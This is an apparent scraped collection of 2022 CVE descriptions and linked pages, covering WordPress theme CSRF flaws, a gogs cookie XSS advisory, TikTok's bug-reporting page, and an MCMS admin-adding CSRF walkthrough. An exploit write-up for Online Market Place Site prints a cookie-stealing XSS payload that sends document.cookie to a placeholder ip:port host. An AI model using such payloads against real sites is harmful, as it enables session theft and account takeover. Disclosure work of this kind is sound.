The Discy WordPress theme before 5.2 lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary 's settings including payment methods via a CSRF attack

CVE-2022-1421

The Discy WordPress theme before 5.2 does not check for CSRF tokens in the AJAX action discy_reset_options, allowing an attacker to trick an admin into resetting the site settings back to defaults.

CVE-2022-1422

The Ask me WordPress theme before 6.8.2 does not perform CSRF checks for any of its AJAX actions, allowing an attacker to trick logged in users to perform various actions on their behalf on the site.

CVE-2022-1424

A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.

CVE-2022-23712: Security issues

### Impact

There is no known practical impact other than it is just possible to manipulate CSRF cookie and XSS the malicious user self.

### Patches

Invalid characters of CSRF tokens are stripped after reading cookie. Users should upgrade to 0.12.8 or the latest 0.13.0+dev.

### Workarounds

No need for workarounds.

### References

N/A

### For more information

If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/6953.


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-pj96-4jhv-v792

**Cross site scripting via cookies in gogs**

Low severity GitHub Reviewed Published Jun 2, 2022 in gogs/gogs • Updated Jun 2, 2022

**Package**

gomod gogs.io/gogs (Go )

**Affected versions**

< 0.12.8

**Description**

**Impact**

There is no known practical impact other than it is just possible to manipulate CSRF cookie and XSS the malicious user self.

**Patches**

Invalid characters of CSRF tokens are stripped after reading cookie. Users should upgrade to 0.12.8 or the latest 0.13.0+dev.

**Workarounds**

No need for workarounds.

**References**

N/A

**For more information**

If you have any questions or comments about this advisory, please post on gogs/gogs#6953.

**References**

*   GHSA-pj96-4jhv-v792
*   gogs/gogs#6953

**Weaknesses**

**GHSA ID**

GHSA-pj96-4jhv-v792

**Source code**

GHSA-pj96-4jhv-v792: Cross site scripting via cookies in gogs

Uncontrolled resource consumption in Mattermost version 6.6.0 and earlier allows an authenticated attacker to crash the server via a crafted SVG attachment on a post.

CVE-2022-1982: Security Updates

The TikTok application before 23.8.4 for Android allows account takeover. A crafted URL (unvalidated deeplink) can force the com.zhiliaoapp.musically WebView to load an arbitrary website. This may allow an attacker to leverage an attached JavaScript interface for the takeover with one click.

**Report security vulnerabilities**

****Report Security Vulnerabilities****

  
TikTok's mission is to inspire creativity and bring joy. The security and health of our platform closely tie to this mission. If things aren't working properly on TikTok, our dedicated security team is ready to respond and resolve those issues. In addition to our team of experienced security professionals and industry-leading security technologies, we rely on, and value, external input that flag technical security bugs on our platform. With that in mind, we have defined a set of policies to guide our external partners on properly reporting vulnerabilities. We welcome your input and appreciate your efforts to safeguard TikTok.

**

**Vulnerability Reporting Policy**

**

       •  For questions, concerns, or issues with your profile, please click here.  
       •  For questions, concerns, or issues with TikTok's privacy policy or fraud, please click here.  
       •  If someone is misusing your brand, contact us.

If you believe you have discovered a security bug or vulnerability on the TikTok app or website, please submit your report here. You will be redirected to the website of HackerOne, our trusted security bug bounty partner. HackerOne provides more information on submission guidelines and will allow you to submit a report.

TikTok follows a Coordinated Disclosure Policy. Please refer to the **Disclosure and Confidentiality Policy** defined in TikTok HackerOne Policy for more details.

**

**Guidelines**

**

  
Please visit the **Program Rules and Guidelines** section in TikTok HackerOne Policy for details.

**

**Frequently Asked Questions (FAQ)**

**

**What type of issues are considered security vulnerabilities and should be reported?**

Issues regarding technical security bugs affecting TikTok should be reported here. Issues include, but are not limited to the following:  
       •  XSS, CSRF, SSRF , SQL Injection, ROP, JOP, etc.       •  Leaked or hard coded sensitive credentials       •  Exploitable and dangerous APIs.  
       •  Control flow hijacking attacks  
       •  User data leaks  
       •  Issues listed in the OWASP Top Ten for Web Apps  
       •  Issues listed in the OWASP Top Ten for Mobile Apps  
       •  Authentication or authorization vulnerabilities  
       •  Access to internal TikTok resources like backend source code, database, etc.  
       •  Open redirect - if an additional security impact can be demonstrated  
       •  Anti-Automation security bypasses or lack of rate limiting on authenticated endpoints  
       •  Using the TikTok application for privilege escalation to attack the mobile operating system  
       •  Arbitrary code execution on TikTok servers/clients

**Is there a reward, bounty or CVE for confirmed vulnerabilities?**

Please visit **Rewards** & **Not Eligible for Reward** sections in TikTok HackerOne Policy for more details about bounty.

**How much time is needed before I can publish my findings?**

We request that security researchers follow the **Disclosure and Confidentiality Policy** defined in TikTok HackerOne Policy.

**Which web domains are within scope for TikTok?**

Please visit **In Scope** section in TikTok HackerOne Policy for details.

**How can I be notified that a security issue I've reported is being investigated?**

The security issues reported will be evaluated based on criticality and business priority and go through our investigation triage pipeline accordingly. We will keep you informed of the progress of the case to the best of our ability.

**Was this helpful?**

**Helpful links**

Creating an account

Setting up your profile

Creating a TikTok Video

CVE-2022-28799: Report security vulnerabilities | TikTok Help Center

A cross-site scripting (XSS) vulnerability in /omps/seller of Online Market Place Site v1.0 allows attackers to execute arbitrary web cripts or HTML via a crafted payload injected into the Page parameter.

**Exploit Title: Online Market Place Site v1.0 - XSS and CSRF****Date: April 17, 2022****Vendor Homepage: https://www.sourcecodester.com/php/15273/online-market-place-site-phpoop-free-source-code.html****Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/omps.zip****Tested on: Parrot Linux, Apache, Mysql****Vendor: oretnom23****Version: v1.0****Exploit Description:****Online Market Place v1.0 suffers from Cross Site Scripting and Cross Site Request Forgery Vulnerability that allowing attackers to steal the cookies of other users(possible account takeover).**

\---------------------------------------- To Exploit ---------------------------------------------------------

Step 1: Register and login as a seller.

Step 2: Goto product page click action and select view product, you can see url like http://localhost/omps/seller/?page=products/view\_details&id=4

Step 3: The page parameter is the vulnerable to cross site scripting because it's not sanitizing the user input.

step 4: put the payload  and you will see the pop window that reflects 1337.

step 5: Now attacker can send malicious url to other user then perfom csrf and finally takeover their account.

For stealing the cookies : <img src='x' onerror=this.src=http://ip:port/?'+document.cookie;>

Final Payload : http://localhost/omps/seller/?page=<img src='x' onerror=this.src=http://ip:port/?'+document.cookie;>&id=4

CVE-2022-29628: OpenSource/exploit_rxss.md at main · nsparker1337/OpenSource

An issue was discovered in MCMS 5.2.7. There is a CSRF vulnerability that can add an administrator account via ms/basic/manager/save.do.

****Product official website:****

https://ms.mingsoft.net/

****Product download address:****

https://gitee.com/mingSoft/MCMS https://github.com/ming-soft/MCMS

****Vulnerability Description:****

There is a CSRF vulnerability in the background adding user of MCMs administrator. When adding a user without adding a token and verifying the reference, the attacker can phishing attack the administrator by constructing a special page. When the administrator accidentally accesses the special page constructed by the attacker, trigger the payload to secretly add the administrator user, and the attacker can obtain the privileges of the background administrator.

****Vulnerability recurrence:****

Environment construction reference: https://gitee.com/mingSoft/MCMS The description document in the document can be used After the environment is set up, access the background. The local access background address is: http://localhost:8080/ms/login.do Use the default account password: msopen / msopen After logging in, find the place to add administrator user as shown in the figure below:

Add all the information needed to add the administrator, then click save and capture the package:

Use burp to generate the payload of CSRF, copy the HTML code and save it locally

Save the following HTML code as test.html

Then use the same browser you just logged in to open the locally saved HTML page

Click submit request above to see the return value and successfully add the administrator.

OK!

CVE-2022-29647: MCMS CSRF

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

Tag

#csrf